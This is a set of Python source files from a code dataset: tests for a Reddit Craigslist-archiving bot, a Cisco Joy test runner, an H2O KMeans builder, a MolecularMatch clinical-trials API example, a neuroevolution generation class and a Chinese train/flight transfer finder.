test_RedditPost_GivenComment_PullsTextFromBody(self):\n\t\tpost = bot.RedditPost(self.mock_comment)\n\t\tself.assertEqual(post.text, self.mock_comment.body)\n\n\tdef test_RedditPost_ReplyToSubmission_CallsPrawReply(self):\n\t\tpost = 
bot.RedditPost(self.mock_submission)\n\t\tpost.reply('')\n\t\tself.mock_submission.reply.assert_called()\n\n\tdef test_RedditPost_ReplyToComment_CallsPrawReply(self):\n\t\tpost = bot.RedditPost(self.mock_comment)\n\t\tpost.reply('')\n\t\tself.mock_comment.reply.assert_called()\n\n\nclass TestPageRequest(unittest.TestCase):\n\tdef setUp(self):\n\t\tself.url = 'http://indianapolis.craigslist.org/bar/d/bears/6451661128.html'\n\n\tdef test_RequestPage_GivenValidUrl_ReturnsTextOfPage(self):\n\t\tresponse = Mock(ok=True, text='')\n\t\twith unittest.mock.patch('archivebot.bot.requests.get') as patch:\n\t\t\tpatch.return_value = response\n\t\t\tself.assertEqual('', bot.request_page(self.url))\n\n\tdef test_RequestPage_GivenInvalidUrl_RaisesError(self):\n\t\tresponse = Mock(status_code=404, ok=False)\n\t\twith unittest.mock.patch('archivebot.bot.requests.get') as patch:\n\t\t\tpatch.return_value = response\n\t\t\twith self.assertRaises(bot.PageNotFoundError):\n\t\t\t\tbot.request_page(self.url)\n\n\tdef test_RequestPage_ServerError_RaisesError(self):\n\t\tresponse = Mock(status_code=500, ok=False)\n\t\twith unittest.mock.patch('archivebot.bot.requests.get') as patch:\n\t\t\tpatch.return_value = response\n\t\t\twith self.assertRaises(bot.PageUnavailableError):\n\t\t\t\tbot.request_page(self.url)\n\n\nclass TestFormat(unittest.TestCase):\n\tdef setUp(self):\n\t\timages = [\n\t\t\t'https://i.imgur.com/abcd001.jpg',\n\t\t\t'https://i.imgur.com/abcd002.jpg',\n\t\t\t'https://i.imgur.com/abcd003.jpg'\n\t\t\t]\n\t\tself.ad = custommodels.CraigslistAd(\n\t\t\ttitle='Post title',\n\t\t\tbody='Post description line 1.\\n\\nPost description line 2.',\n\t\t\turl='http://indianapolis.craigslist.org/bar/d/bears/6451661128.html',\n\t\t\t)\n\t\tself.archive = custommodels.Archive(\n\t\t\turl='https://imgur.com/a/zzzz1', title='xxx',\n\t\t\tad=self.ad, screenshot='https://i.imgur.com/abcd000.jpg',\n\t\t\timages=images)\n\n\tdef test_Formatter_GivenArchive_FormatsTitle(self):\n\t\tformatter = bot.PostFormatter()\n\t\tself.assertIn('### Post title ###', formatter.format(self.archive))\n\n\tdef test_Formatter_GivenArchive_FormatsTitleAsQuote(self):\n\t\tformatter = bot.PostFormatter()\n\t\tself.assertIn('> ### Post title ###', formatter.format(self.archive))\n\n\tdef test_Formatter_GivenOriginalPost_FormatsOriginalPost(self):\n\t\tformatter = bot.PostFormatter()\n\t\tlinktext = '[original post](http://indianapolis.craigslist.org/bar/d/bears/6451661128.html)'\n\t\tself.assertIn(linktext, formatter.format(self.archive))\n\n\tdef test_Formatter_GivenAlbumUrl_FormatsAlbumUrl(self):\n\t\tformatter = bot.PostFormatter()\n\t\tlinktext = '[imgur album](https://imgur.com/a/zzzz1)'\n\t\tself.assertIn(linktext, formatter.format(self.archive))\n\n\tdef test_Formatter_GivenScreenshot_FormatsScreenshot(self):\n\t\tformatter = bot.PostFormatter()\n\t\tlinktext = '[screenshot](https://i.imgur.com/abcd000.jpg)'\n\t\tself.assertIn(linktext, formatter.format(self.archive))\n\n\tdef test_Formatter_GivenAdBody_FormatsAdBody(self):\n\t\tformatter = bot.PostFormatter()\n\t\ttext = 'Post description line 1'\n\t\tself.assertIn(text, formatter.format(self.archive))\n\n\tdef test_Formatter_GivenAdBody_FormatsAdBodyAsQuote(self):\n\t\tformatter = bot.PostFormatter()\n\t\ttext = '> Post description line 1'\n\t\tself.assertIn(text, formatter.format(self.archive))\n\n\tdef test_Formatter_GivenMultiLineAdBody_FormatsAllLinesAsQuote(self):\n\t\tformatter = bot.PostFormatter()\n\t\ttext = '> Post description line 1.\\n>\\n> Post description line 
2.'\n\t\tself.assertIn(text, formatter.format(self.archive))\n\n\tdef test_Formatter_GivenMultipleImages_FormatsImages(self):\n\t\tformatter = bot.PostFormatter()\n\t\ttext = '[image 1](https://i.imgur.com/abcd001.jpg) | [image 2](https://i.imgur.com/abcd002.jpg) | [image 3](https://i.imgur.com/abcd003.jpg)'\n\t\tself.assertIn(text, formatter.format(self.archive))\n\n\tdef test_Formatter_GivenImage_FormatsImagesAsQuote(self):\n\t\tformatter = bot.PostFormatter()\n\t\ta = deepcopy(self.archive)\n\t\ta.images = a.images[:1]\n\t\ttext = '> [image 1](https://i.imgur.com/abcd001.jpg)'\n\t\tself.assertIn(text, formatter.format(a))\n\n\tdef test_Formatter_GivenMultipleImage_FormatsImagesAsQuote(self):\n\t\tformatter = bot.PostFormatter()\n\t\ttext = '> [image 1](https://i.imgur.com/abcd001.jpg) | [image 2](https://i.imgur.com/abcd002.jpg) | [image 3](https://i.imgur.com/abcd003.jpg)'\n\t\tself.assertIn(text, formatter.format(self.archive))\n\n\tdef test_Formatter_GivenNoImages_HasNoTrailingQuoteMarks(self):\n\t\tformatter = bot.PostFormatter()\n\t\ta = deepcopy(self.archive)\n\t\ta.images = []\n\t\tself.assertIn('> Post description line 2.\\n', formatter.format(a))\n\t\tself.assertNotIn('> Post description line 2.\\n>', formatter.format(a))\n\n\tdef test_Formatter_GivenMultipleImages_ReturnsCorrectFullReply(self):\n\t\texpected_reply = (\n\t\t\t'This Craigslist post has been archived so it can continue to be viewed after expiration.\\n\\n'\n\t\t\t'[original post](http://indianapolis.craigslist.org/bar/d/bears/6451661128.html) | [imgur album](https://imgur.com/a/zzzz1) | [screenshot](https://i.imgur.com/abcd000.jpg)\\n\\n'\n\t\t\t'> ### Post title ###\\n'\n\t\t\t'>\\n'\n\t\t\t'> Post description line 1.\\n'\n\t\t\t'>\\n'\n\t\t\t'> Post description line 2.\\n'\n\t\t\t'>\\n'\n\t\t\t'> [image 1](https://i.imgur.com/abcd001.jpg) | [image 2](https://i.imgur.com/abcd002.jpg) | [image 3](https://i.imgur.com/abcd003.jpg)\\n\\n'\n\t\t\t'***\\n\\n'\n\t\t\t'[^github](https://github.com/darricktheprogrammer/reddit-cl-bot) ^| [^send ^message/report](/#)'\n\t\t\t)\n\t\tformatter = bot.PostFormatter()\n\t\tself.assertEqual(expected_reply, formatter.format(self.archive))\n\n\tdef test_Formatter_GivenSingleImage_ReturnsCorrectFullReply(self):\n\t\texpected_reply = (\n\t\t\t'This Craigslist post has been archived so it can continue to be viewed after expiration.\\n\\n'\n\t\t\t'[original post](http://indianapolis.craigslist.org/bar/d/bears/6451661128.html) | [imgur album](https://imgur.com/a/zzzz1) | [screenshot](https://i.imgur.com/abcd000.jpg)\\n\\n'\n\t\t\t'> ### Post title ###\\n'\n\t\t\t'>\\n'\n\t\t\t'> Post description line 1.\\n'\n\t\t\t'>\\n'\n\t\t\t'> Post description line 2.\\n'\n\t\t\t'>\\n'\n\t\t\t'> [image 1](https://i.imgur.com/abcd001.jpg)\\n\\n'\n\t\t\t'***\\n\\n'\n\t\t\t'[^github](https://github.com/darricktheprogrammer/reddit-cl-bot) ^| [^send ^message/report](/#)'\n\t\t\t)\n\t\ta = deepcopy(self.archive)\n\t\ta.images = a.images[:1]\n\t\tformatter = bot.PostFormatter()\n\t\tself.assertEqual(expected_reply, formatter.format(a))\n\n\tdef test_Formatter_GivenNoImages_ReturnsCorrectFullReply(self):\n\t\texpected_reply = (\n\t\t\t'This Craigslist post has been archived so it can continue to be viewed after expiration.\\n\\n'\n\t\t\t'[original post](http://indianapolis.craigslist.org/bar/d/bears/6451661128.html) | [imgur album](https://imgur.com/a/zzzz1) | [screenshot](https://i.imgur.com/abcd000.jpg)\\n\\n'\n\t\t\t'> ### Post title ###\\n'\n\t\t\t'>\\n'\n\t\t\t'> Post description line 
1.\\n'\n\t\t\t'>\\n'\n\t\t\t'> Post description line 2.\\n\\n'\n\t\t\t'***\\n\\n'\n\t\t\t'[^github](https://github.com/darricktheprogrammer/reddit-cl-bot) ^| [^send ^message/report](/#)'\n\t\t\t)\n\t\ta = deepcopy(self.archive)\n\t\ta.images = []\n\t\tformatter = bot.PostFormatter()\n\t\tself.assertEqual(expected_reply, formatter.format(a))\n\n\nif __name__ == '__main__':\n\tunittest.main()\n","sub_path":"test/test-bot.py","file_name":"test-bot.py","file_ext":"py","file_size_in_byte":12033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"649723096","text":"#!/usr/bin/env python\n\"\"\"\n *\n * Copyright (c) 2016 Cisco Systems, Inc.\n * All rights reserved.\n *\n * Redistribution and use in source and binary forms, with or without\n * modification, are permitted provided that the following conditions\n * are met:\n *\n * Redistributions of source code must retain the above copyright\n * notice, this list of conditions and the following disclaimer.\n *\n * Redistributions in binary form must reproduce the above\n * copyright notice, this list of conditions and the following\n * disclaimer in the documentation and/or other materials provided\n * with the distribution.\n *\n * Neither the name of the Cisco Systems, Inc. nor the names of its\n * contributors may be used to endorse or promote products derived\n * from this software without specific prior written permission.\n *\n * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n * \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS\n * FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE\n * COPYRIGHT HOLDERS OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,\n * INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n * (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\n * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)\n * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,\n * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED\n * OF THE POSSIBILITY OF SUCH DAMAGE.\n *\n\"\"\"\n\nimport logging\nimport argparse\nfrom pytests_joy.ipfix import main_ipfix\nfrom pytests_joy.tls import main_tls\n\n\ndef modify_test_suite(suite, module_flag, module_func, single_module):\n \"\"\"\n Change the list of test modules that will be run.\n :param suite: List of test modules\n :param module_flag: A flag corresponding to a single module, given through CLI\n :param module_func: The entry point function of the selected test module\n :param single_module: If it exists, the current selection for SINGLE (1 only) module to run.\n :return: The entry point function if its module was selected to run alone, otherwise None.\n \"\"\"\n if module_flag == 'no':\n # Exclude the specified module\n suite.remove(module_func)\n return None\n elif module_flag == 'yes':\n # Only test the specified module\n if single_module:\n logger.error(str(single_module) + ' has been selected to run by itself. ' +\n 'only 1 module can be run individually.')\n exit(1)\n # Rebuild the list in place; removing items while iterating would skip elements\n suite[:] = [test for test in suite if test is module_func]\n return module_func\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n description='Defaults to run all of pytests_joy modules. 
' +\n 'Please use the listed module options to select a subset.'\n )\n parser.add_argument('-l', '--log',\n dest='log_level',\n choices=['debug', 'info', 'warning', 'error', 'critical'],\n help='Set the logging level')\n parser.add_argument('--log-file',\n action='store_true',\n dest='log_file',\n help='Log messages to a file instead of the console (terminal).')\n parser.add_argument('--ipfix',\n dest='flag_ipfix',\n choices=['yes', 'no'],\n help='yes to run ONLY ipfix module; no to exclude from test suite')\n parser.add_argument('--tls',\n dest='flag_tls',\n choices=['yes', 'no'],\n help='yes to run ONLY tls module; no to exclude from test suite')\n parser.add_argument('--tls-base-dir',\n dest='tls_base_dir',\n help='Specify the absolute path to directory where tls baseline files will reside.')\n parser.add_argument('--tls-pcap-dir',\n dest='tls_pcap_dir',\n help='Specify the absolute path to directory where tls pcap files currently exist.')\n parser.add_argument('--tls-make-base',\n action='store_true',\n dest='tls_make_base',\n help='Use to create a new set of tls baseline files. ')\n parser.add_argument('--tls-base-file-generic',\n action='store_true',\n dest='tls_base_generic',\n help='Use a generic default name when making baseline files. ' +\n 'Caution: overwrite of previous files with same name is probable!')\n args = parser.parse_args()\n\n \"\"\"\n Configure logging\n \"\"\"\n LEVELS = {'debug': logging.DEBUG,\n 'info': logging.INFO,\n 'warning': logging.WARNING,\n 'error': logging.ERROR,\n 'critical': logging.CRITICAL}\n\n log_level = None\n if args.log_level:\n log_level = LEVELS[args.log_level.lower()]\n\n log_file = None\n if args.log_file:\n logging.basicConfig(\n filename='pytest-joy.log',\n level=log_level,\n format='%(asctime)s - {%(filename)s:%(lineno)d} - %(levelname)s - %(message)s',\n )\n else:\n logging.basicConfig(\n level=log_level,\n format='%(name)s: %(levelname)s %(message)s',\n )\n\n logger = logging.getLogger(__name__)\n\n \"\"\"\n Add a new test:\n 1: Import the module that contains test\n 2: Add the test function reference to the 'test_suite' list below\n \"\"\"\n test_suite = [main_ipfix, main_tls, ]\n\n single_mod = None\n if args.flag_ipfix:\n single_mod = modify_test_suite(test_suite, args.flag_ipfix, main_ipfix, single_mod)\n if args.flag_tls:\n single_mod = modify_test_suite(test_suite, args.flag_tls, main_tls, single_mod)\n\n logger.warning('runtests start...')\n logger.warning('~~~~~~~~~~~~~~~~~')\n\n for test in test_suite:\n if test is main_tls:\n # Invoke with proper parameter values for TLS\n rc_main = main_tls(args.tls_base_dir, args.tls_pcap_dir,\n args.tls_make_base, args.tls_base_generic)\n else:\n rc_main = test()\n if rc_main != 0:\n logger.warning('FAILED')\n exit(rc_main)\n\n logger.warning('SUCCESS')\n exit(0)\n","sub_path":"joy-master/test/run_tests.py","file_name":"run_tests.py","file_ext":"py","file_size_in_byte":6469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"68685087","text":"\"\"\"\nA KMeans model builder.\n\"\"\"\n\nfrom h2o_model_builder import H2OModelBuilder\n\n\nclass H2OKMeansBuilder(H2OModelBuilder):\n \"\"\"\n Build a new KMeans model.\n\n Example Usage:\n\n from h2o.model.km_builder import H2OKMeans # import this builder\n\n my_km = H2OKMeans() # create a new kmeans object\n my_km.x = [0,1,2,3] # fill in parameters:\n my_km.training_frame = \n my_km.k = 5\n my_km.max_iterations = 100\n my_km.init = \"PlusPlus\"\n\n my_km.fit() # perform the model fit\n 
\"\"\"\n\n SELF = \"kmeans\"\n\n def __init__(self, x=None, k=5, training_frame=None, key=None, max_iterations=1000,\n standardize=True, init=(\"Furthest\", \"Random\", \"PlusPlus\"), seed=None):\n \"\"\"\n Instantiate a KMeansBuilder.\n :param x: Columns to use for clustering (may be indices or strings).\n :param k: Number of clusters (must be between 1 and 1e7 inclusive).\n :param training_frame: An object of type H2OFrame.\n :param key: The output name of the model.\n :param max_iterations: The maximum number of iterations allowed\n (must be between 0 and 1e6 inclusive).\n :param standardize: Whether data should be standardized before clustering.\n :param init: How to select initial set of cluster points. Random for random\n initialization, Furthest for initialization at furthest point from\n successive centers, and PlusPlus for k-means++.\n :param seed: A random seed.\n :return: A new KMeansBuilder.\n \"\"\"\n super(H2OKMeansBuilder, self).__init__(locals(), self.SELF, training_frame)\n self.__dict__.update(locals())\n\n # deal with \"tuple\" defaults\n self.init = \"Random\" if isinstance(init, tuple) else init\n","sub_path":"h2o-py/h2o/model/h2o_km_builder.py","file_name":"h2o_km_builder.py","file_ext":"py","file_size_in_byte":1927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"253982050","text":"# MolecularMatch API (MM-DATA) Python Example Sheet\n# Based on documentation at https://api.molecularmatch.com\n# Author: Shane Neeley, MolecularMatch Inc., Jan. 30, 2018\n\nimport requests\nimport json\nimport numpy as np\nimport sys\n\nresourceURLs = {\n\t\"trialSearch\": \"/v2/search/trials\",\n\t\"drugSearch\": \"/v2/search/drugs\",\n\t\"publicationSearch\": \"/v2/search/publications\",\n\t\"mutationGet\": \"/v2/mutation/get\",\n\t\"geneGet\": \"/v2/gene/get\",\n\t\"mutationClassify\": \"/v2/mutation/classify\",\n\t\"validateTerms\": \"/v2/validate/terms\",\n\t\"assertionSearch\": \"/v2/search/assertions\",\n\t\"assertionExport\": \"/v2/export/assertions\"\n}\nmmService = \"https://api.molecularmatch.com\"\n\n# CHANGE THIS TO YOUR KEY or use as parameter (e.g. 
$ python3 publicationsAPI.py key)\napiKey = ''\nif apiKey == '' and len(sys.argv) > 1:\n\tapiKey = sys.argv[1]\n\n#// TODO: geolocation searches\n\n#####################search trials##################################\n\nurl = mmService + resourceURLs[\"trialSearch\"]\nfilters = [{'facet':'CONDITION','term':'Lung cancer'}]\npayload = {\n\t'apiKey': apiKey,\n\t'filters': filters\n}\nr = requests.post(url, json=payload)\nprint(json.dumps(r.json()))\n\n##################################################################\n#####################SCENARIOS####################################\n##################################################################\n\n#### Clinical trial reporting\n\n# When looking up trials for an actual patient, it is important to include the filters of Enrolling and Interventional\nurl = mmService + resourceURLs[\"trialSearch\"]\nfilters = [\n\t{\"facet\":\"CONDITION\",\"term\":\"Colorectal cancer\"},\n\t{\"facet\":\"MUTATION\",\"term\":\"BRAF V600E\"},\n\t{\"facet\":\"STATUS\", \"term\":\"Enrolling\"},\n\t{\"facet\":\"TRIALTYPE\", \"term\":\"Interventional\"},\n\t{\"facet\":\"COUNTRY\", \"term\":\"France\"}\n]\npayload = {\n\t'apiKey': apiKey,\n\t'filters': filters\n}\nr = requests.post(url, json=payload)\n\n# Question: how many trials for a patient with this mutation and disease are interventional and enrolling in France?\nprint(r.json()['total'])\n# Answer: 4\n\n# Question: what are these trials' ClinicalTrials.gov IDs and titles and email addresses for contact?\nfor i in np.arange(0, len(r.json()['rows']) ):\n\tprint(r.json()['rows'][i]['id'])\n\tprint(r.json()['rows'][i]['briefTitle'])\n\tprint(r.json()['rows'][i]['overallContact'])\n# Answer:\n# NCT02291289 - A Multi-Center Study of Biomarker-Driven Therapy in Metastatic Colorectal Cancer - global.rochegenentechtrials@roche.com\n# NCT01677741 - A Study to Determine Safety, Tolerability and Pharmacokinetics of Oral Dabrafenib In Children and Adolescent Subjects - GSKClinicalSupportHD@gsk.com\n# NCT02788279 - A Study to Investigate Efficacy and Safety of Cobimetinib Plus Atezolizumab and Atezolizumab Monotherapy Versus Regorafenib in Participants With Metastatic Colorectal Adenocarcinoma - global.rochegenentechtrials@roche.com\n# NCT02751177 - Detection of KRAS, NRAS et BRAF Mutations in Plasma Circulating DNA From Patients With Metastatic Colorectal Cancer - v.gillon@nancy.unicancer.fr\n\n# Question: what are all the mutations that are associated with trial NCT02291289?\nfilters = [\n\t{\"facet\":\"ID\",\"term\":\"NCT02291289\"}\n]\npayload = {\n\t'apiKey': apiKey,\n\t'filters': filters\n}\nr = requests.post(url, json=payload)\n# Note: must have tags activated on api key for this to work. 
Not all api key users get tags.\nfor tag in r.json()['rows'][0]['tags']:\n\tif tag['facet'] == \"MUTATION\":\n\t\tprint(tag)\n\n# Answer:\n# 3 mutations are for inclusion criteria\n# {'facet': 'MUTATION', 'term': 'EGFR P546S', 'alias': 'EGFR P546S', 'priority': '0', 'filterType': 'include'}\n# {'facet': 'MUTATION', 'term': 'BRAF V600E', 'alias': 'BRAF V600E', 'priority': '0', 'filterType': 'include'}\n# {'facet': 'MUTATION', 'term': 'Microsatellite instability', 'alias': 'Microsatellite instability', 'priority': '0', 'filterType': 'include'}\n# 2 mutations are for exclusion criteria (filterType = 'exclude')\n# {'facet': 'MUTATION', 'term': 'EGFR S492R', 'alias': 'EGFR S492R', 'priority': 1, 'filterType': 'exclude'}\n# {'facet': 'MUTATION', 'term': 'BRAF G469L', 'alias': 'BRAF G469L', 'priority': 1, 'filterType': 'exclude'}\n\n# See more about the trial data model at: https://api.molecularmatch.com/#trialDataModel\n\n#### Mutation details lookup\n\n# So you want to know everything there is to know about BRAF V600E?\n\nurl = mmService + resourceURLs[\"mutationGet\"]\npayload = {\n\t'apiKey': apiKey,\n\t'name': 'BRAF V600E'\n}\nr = requests.get(url, params=payload)\n\n# Question: what databases have reported this mutation?\nprint(r.json()['sources'])\n# Answer: 'COSMIC', 'CIViC', 'DoCM', 'cBioPortal', 'ClinVar'\n\n# Question: is there a known protein domain this mutation is in?\nfor i in r.json()['parents']:\n\tif (i['type'] == 'domain'):\n\t\tprint(i)\n# Answer: BRAF Pkinase_Tyr domain (protein tyrosine kinase domain)\n\n# What is the clinical interpretation of BRAF V600E? Are there trials, drugs, publications about it?\n\nurl = mmService + resourceURLs[\"mutationClassify\"]\npayload = {\n\t'apiKey': apiKey,\n\t'variant': 'BRAF V600E',\n\t'condition': 'Lung cancer'\n}\nr = requests.post(url, json=payload)\n\n# Question: How does MolecularMatch classify this mutation in this condition?\nprint(r.json()['classifications'][0]['classification'])\n# Answer: actionable\n\n# Question: How many drugs approved and on label for the condition provided?\nprint(r.json()['classifications'][0]['drugsApprovedOnLabelCount'])\n# Answer: 0\n\n# Question: How many drugs approved but off-label for the condition provided?\nprint(r.json()['classifications'][0]['drugsApprovedOffLabelCount'])\n# Answer: 6\n\n# Question: What about experimental drugs?\nprint(r.json()['classifications'][0]['drugsExperimentalCount'])\n# Answer: 4\n\n# Question: How many clinical trials are open for this mutation and condition?\nprint(r.json()['classifications'][0]['trialCount'])\n# Answer: 24\n\n# Question: Is there a lot of research publications about this mutation in this condition?\nprint(r.json()['classifications'][0]['publicationCount'])\n# Answer: 47\n\n# Question: Ok, what are these 4 experimental drugs?\nurl = mmService + resourceURLs[\"drugSearch\"]\n# set geneExpand for Drug to False so drugs return only for V600E, not BRAF (see https://api.molecularmatch.com/#geneExpansion)\nfilters = [\n\t{'facet':'CONDITION','term':'Lung cancer'},\n\t{'facet':'MUTATION','term':'BRAF V600E', \"geneExpand\": {\"Drug\": False}}\n]\npayload = {\n\t'apiKey': apiKey,\n\t'filters': filters,\n\t'mode': 'discovery'\n}\nr = requests.post(url, json=payload)\nfor drug in r.json()['rows']:\n\tprint(drug)\n\tif drug['approved'] == False:\n\t\tprint(drug['name'])\n\n# Answer:\n# Lgx818\n# Plx8394\n# BGB-283\n# Cep-32496\n\n##################################################################\n#####################BASIC 
QUERIES####################################\n##################################################################\n\n####################search drugs##################################\n\nurl = mmService + resourceURLs[\"drugSearch\"]\nfilters = [{'facet':'CONDITION','term':'Lung cancer'}]\npayload = {\n\t'apiKey': apiKey,\n\t'filters': filters,\n\t'mode': 'discovery' # 'criteriaunmet' # multiple modes available for drugsearch. see api docs.\n}\nr = requests.post(url, json=payload)\nprint(json.dumps(r.json()))\n\n#####################search trials##################################\n\nurl = mmService + resourceURLs[\"trialSearch\"]\nfilters = [{'facet':'CONDITION','term':'Lung cancer'}]\npayload = {\n\t'apiKey': apiKey,\n\t'filters': filters\n}\nr = requests.post(url, json=payload)\nprint(json.dumps(r.json()))\n\n# Search trials by various ID types\nfilters = [\n\t{\"facet\":\"ID\",\"term\":\"EUDRACT2017-003305-18\"}\n]\npayload = {\n\t'apiKey': apiKey,\n\t'filters': filters\n}\nr = requests.post(url, json=payload)\nprint('r here')\nprint(r.json())\n\n#####################search publications#############################\n\nurl = mmService + resourceURLs[\"publicationSearch\"]\nfilters = [{'facet':'CONDITION','term':'Lung cancer'}]\npayload = {\n\t'apiKey': apiKey,\n\t'filters': filters\n}\nr = requests.post(url, json=payload)\nprint(json.dumps(r.json()))\n\n####################get mutation###################################\n\nurl = mmService + resourceURLs[\"mutationGet\"]\npayload = {\n\t'apiKey': apiKey,\n\t'name': 'BRAF V600E'\n}\nr = requests.get(url, params=payload)\nprint(json.dumps(r.json()))\n\n######################get gene#################################\n\nurl = mmService + resourceURLs[\"geneGet\"]\npayload = {\n\t'apiKey': apiKey,\n\t'symbol': 'BRAF'\n}\nr = requests.get(url, params=payload)\nprint(json.dumps(r.json()))\n\n######################classify mutation##############################\n\nurl = mmService + resourceURLs[\"mutationClassify\"]\npayload = {\n\t'apiKey': apiKey,\n\t'variant': 'EGFR T790M',\n\t'condition': 'Lung cancer'\n}\nr = requests.post(url, json=payload)\nprint(json.dumps(r.json()))\n","sub_path":"python/trialsAPI.py","file_name":"trialsAPI.py","file_ext":"py","file_size_in_byte":8729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"267202237","text":"# -*- coding: utf-8 -*-\r\n''' Generation Class for NeuroEvolution '''\r\n\r\n### IMPORTS ###\r\nfrom ClassNeuralNet import NeuralNetwork\r\nimport numpy as np\r\n\r\n\r\n### CLASS ###\r\nclass Generation:\r\n \r\n ## CONSTRUCTOR ###\r\n def __init__(self, demography, fitFunction, inputs = 24, hidden = 10, output = 4, loading = False):\r\n ''' Set up the generation & parameters '''\r\n # Get those params if the Generation isn't loaded from a file\r\n self.demography = demography\r\n # Params for the NeuralNet\r\n self.inputs = inputs\r\n self.hidden = hidden\r\n self.output = output\r\n self.population = [NeuralNetwork(self.inputs, self.hidden, self.output) for i in range(self.demography)]\r\n # Mutation rate\r\n self.mr = 0.1\r\n # Fitness function\r\n self.fitFunction = fitFunction\r\n self.num_gen = 1\r\n self.getScores()\r\n \r\n ## METHODS ## \r\n def step(self):\r\n '''\r\n Perform one step of the genetic algorithm\r\n '''\r\n self.naturalselection()\r\n self.getScores()\r\n self.num_gen += 1\r\n \r\n \r\n def getScores(self):\r\n ''' Get the scores '''\r\n self.score = self.evaluate()\r\n self.total_score = self.get_total_score()\r\n self.best = 
self.get_best()\r\n \r\n \r\n def evaluate(self):\r\n '''\r\n Return a list with the fitness score of each network in the population\r\n '''\r\n score = []\r\n current_best = 0\r\n # Get a Neural Net\r\n for i, nn in enumerate(self.population):\r\n score.append(self.fitFunction(nn))\r\n # Print the new score if it's better than the previous one\r\n if score[-1] > current_best:\r\n current_best = score[-1]\r\n print('Net :', i)\r\n print('Score :', current_best)\r\n print()\r\n return score\r\n \r\n def get_best(self):\r\n ''' Return the best Net of the population '''\r\n score_max = max(self.score)\r\n index_max = self.score.index(score_max)\r\n return self.population[index_max]\r\n \r\n \r\n def get_total_score(self):\r\n ''' Calculate it once so it won't calculate it each time it needs it '''\r\n total_score = 0\r\n for score in self.score:\r\n total_score += score\r\n return total_score\r\n \r\n \r\n def pickOne(self):\r\n ''' Pick a random brain of the population based on the score '''\r\n # Normalise the scores to have a prob\r\n self.score = np.array(self.score)\r\n self.prob = self.score / self.total_score\r\n self.score = list(self.score)\r\n # Pick a random number\r\n r = np.random.rand()\r\n for i in range(len(self.population)):\r\n r = r - self.prob[i]\r\n if r <= 0 :\r\n return self.population[i]\r\n \r\n \r\n def naturalselection(self):\r\n ''' Make a new generation '''\r\n # Save the best of the last population\r\n new_pop = [self.best]\r\n # Make the new generation\r\n for i in range(1,self.demography):\r\n # Pick 2 parents for the crossover\r\n parent1 = self.pickOne()\r\n parent2 = self.pickOne()\r\n child = parent1.crossover(parent2)\r\n # Mutate the child (based on the mutation rate)\r\n child.mutate(self.mr)\r\n new_pop.append(child)\r\n self.population = new_pop\r\n","sub_path":"GeneticSnake/ClassGeneration.py","file_name":"ClassGeneration.py","file_ext":"py","file_size_in_byte":3514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"248225146","text":"import pandas as pd\nimport numpy as np\nimport time\nimport random\n\n\nclass Transfer(object):\n    def __init__(self):\n        self.train_info = pd.read_excel('./data/capital_train_info_0304.xls')\n        self.plane_info = pd.read_excel('./data/capital_airplane_info_0304.xls')\n        self.from_city = ''\n        self.to_city = ''\n\n    def start(self, from_city, to_city):\n        self.from_city = from_city\n        self.to_city = to_city\n\n        route_info = self.select_station()\n        results = self.filter(route_info)\n        print(results)\n\n    def select_station(self):\n        train_info = self.train_info\n        plane_info = self.plane_info\n        from_city = self.from_city\n        to_city = self.to_city\n\n        train_transit = train_info[train_info['出发地'] == from_city][[\n            '编号', '出发地', '到达地', '出发时间', '到达时间', '历时']]\n        plane_transit = plane_info[plane_info['出发地'] == from_city][[\n            '编号', '出发地', '到达地', '出发时间', '到达时间', '历时']]\n        route_info = pd.concat([train_transit, plane_transit])\n        transit_city = pd.unique(route_info['到达地'])\n\n        result = [route_info]\n        for city in transit_city:\n            train_transit = (train_info[(train_info['出发地'] == city) &\n                             (train_info['到达地'] == to_city)][['出发地', '到达地', '出发时间', '到达时间', '历时']])\n            plane_transit = (plane_info[(plane_info['出发地'] == city) &\n                             (plane_info['到达地'] == to_city)][['出发地', '到达地', '出发时间', '到达时间', '历时']])\n            result.append(pd.concat([train_transit, plane_transit]))\n\n        route_info = pd.concat(result)\n        return route_info\n\n    def filter(self, route_info):\n        citys = 
pd.unique(route_info['到达地'])\n citys = citys[citys != self.to_city]\n\n # result = pd.DataFrame(columns=['出发城市', '出发时间', '到达时间', '耗时',\n # '中转城市', '中转停留', '出发时间', '到达时间',\n # '耗时', '到达城市'])\n\n result = []\n for city in citys:\n from_info = route_info[route_info['到达地'] == city].sort_values(by='历时')[:1]\n to_info = route_info[route_info['出发地'] == city].sort_values(by='历时')[:1]\n result.append(from_info)\n result.append(to_info)\n\n results = pd.concat(result)\n\n return results\n\n\n\n\nif __name__ == '__main__':\n trans = Transfer()\n s = time.time()\n trans.start('北京', '深圳')\n # try:\n # trans.start('北京', '深圳')\n # except:\n # print(time.time()-s)\n print(time.time() - s)","sub_path":"algorithm/Transfer_once/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
